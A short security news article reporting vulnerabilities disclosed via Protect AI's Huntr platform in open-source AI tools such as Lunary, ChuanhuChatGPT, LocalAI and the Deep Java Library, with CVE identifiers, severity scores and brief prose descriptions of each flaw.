Researchers Identify Vulnerabilities in Open-Source AI and ML Models
Over three dozen security vulnerabilities have been found in various open-source AI and ML models, with some capable of enabling remote code execution and data theft. These flaws, discovered in tools such as ChuanhuChatGPT, Lunary, and LocalAI, were reported via Protect AI’s Huntr bug bounty platform.
The most severe of the flaws are two shortcomings impacting Lunary, a production toolkit for large language models (LLMs) -
Protect AI detailed an attack scenario where an attacker logs in as User A and intercepts a prompt update request. By altering the 'id' parameter to match a prompt belonging to User B, the attacker can modify User B's prompt without authorization.
Another critical vulnerability (CVE-2024-5982, CVSS 9.1) involves a path traversal issue in ChuanhuChatGPT’s upload feature, which could lead to arbitrary code execution, unauthorized directory creation, and exposure of sensitive data.
LocalAI, an open-source platform for running self-hosted LLMs, also faces two vulnerabilities. One (CVE-2024-6983, CVSS 8.8) could allow arbitrary code execution through a malicious configuration file, while another (CVE-2024-7010, CVSS 7.5) enables API key guessing via response time analysis, allowing an attacker to deduce a valid key one character at a time, as described by Protect AI.
Additionally, a remote code execution vulnerability in the Deep Java Library (DJL) (CVE-2024-8396, CVSS 7.8) is linked to an arbitrary file overwrite issue within its untar function.
The disclosure comes shortly after NVIDIA released patches for a path traversal vulnerability in its NeMo generative AI framework (CVE-2024-0129, CVSS 6.3), which could result in code execution and data tampering.
For Further Reference